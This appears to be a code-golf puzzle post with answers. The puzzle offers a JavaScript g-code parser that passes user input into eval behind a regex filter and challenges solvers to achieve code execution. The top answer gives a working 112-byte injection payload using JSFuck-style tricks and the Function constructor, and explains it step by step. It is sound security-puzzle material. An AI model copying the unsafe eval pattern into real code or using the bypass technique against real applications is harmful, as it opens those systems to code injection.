# Hack g-code.js parser

Tags: code-golf, javascript

Here you can see g-code parser, written in JavaScript to use in microcontroller (like espruino). But you can run it in browser, because it don't use any specific features.

```js
function gcode(str){
  //Removes comment, parses command name and args
  const [,f,args] = (str.match(/^([GM]\d+) ([^;]+)/) || [,"",""]);
  //A1.2 B43 C -> {A: 1.2, B: 42, C: 0}
  eval(f+"({"+args.replace(/(\w)([\d\.]*)/g,"$1: $2+0,")+"})");
}
const G1 = console.log;
gcode(prompt("crackme"));
```

When you pass `G1 X3 Y4.53 Z42` to `gcode()`, it runs `G1({X: 3, Y: 4.53, Z: 42})`. As you can see, it uses `eval`, protected by regexp. But despite of this, you can attack this function and cause remote code execution. Your goal is to run `alert("pwned")`. This is code golf, so shortest working input wins

[image: example]

Comment: Is ```alert`pwned` ``` fine?

Comment: I suggest editing the post to say [[your goal is to display a dialog box with the text "pwned", as if `alert("pwned")` was run]].

Comment: @l4m2 if it opens box with "pwned"

Answer (score 7):

## 112 bytes

```
G1 $:(ƒ=(Τ,$=+[])=>Τ[$]?Τ[$]+ƒ(Τ,++$+'5'[+[]]*(Τ[$]==':')):'')[ƒ('constructor')](ƒ('alert("pwned")'))()
```

```js
function gcode(str){
  //Removes comment, parses command name and args
  const [,f,args] = (str.match(/^([GM]\d+) ([^;]+)/) || [,"",""]);
  //A1.2 B43 C -> {A: 1.2, B: 42, C: 0}
  eval(f+"({"+args.replace(/(\w)([\d\.]*)/g,"$1: $2+0,")+"})");
}
const G1 = console.log;

payload = `G1 $:(ƒ=(Τ,$=+[])=>Τ[$]?Τ[$]+ƒ(Τ,++$+'5'[+[]]*(Τ[$]==':')):'')[ƒ('constructor')](ƒ('alert("pwned")'))()`;
gcode(payload);
```

- Each `ƒ` (U+0192), `Τ` (U+03A4) cost 2 bytes, they are not as same as ASCII `f`, `T`.

---

The `gcode` function will keep any `/\W/` characters as is. So, we just need to use these characters to write some logic here. The idea is basically based on how JSF**k works. We construct the codes like this:

```
(()=>{})["constructor"]('alert("pwned")')
```

We need string literal `"constructor"` and `alert("pwned")`. But `gcode` convert `"constructor"` to `"c: +0,o: +0,n: +0,....r: +0"`. So we need to convert the string back. We use this function to do the convert:

```
ƒ=(Τ,$=+[])=>Τ[$]?Τ[$]+ƒ(Τ,++$+'5'[+[]]*(Τ[$]==':')):''
```

`Τ` is the text inputed, $ is index. We first initialize `$` to 0 using `+[]`. Then we output the character at the index position, and check if next character is `":"`, if so we skip the following 5 characters.

---

Thanks to l4m2, saves few bytes.

Comment: Use `$=>$` instead?

Comment: ```+'5'[+[]]```?

Comment: @l4m2 +'5' will convert to string which is incorrect.

Comment: I was thinking `-~-~-~-~-~$` instead of `$-~'4'[+[]]` but it turns out to be the same length.

Comment: @Neil changed to `++$+'5'[+[]]*(ß[$]==':')` anyway

Comment: Amazing! I used jsfuck to convert `alert("pwned)` to about 6K symbols from `()[]+!` subset

Comment: how it works? It looks like magic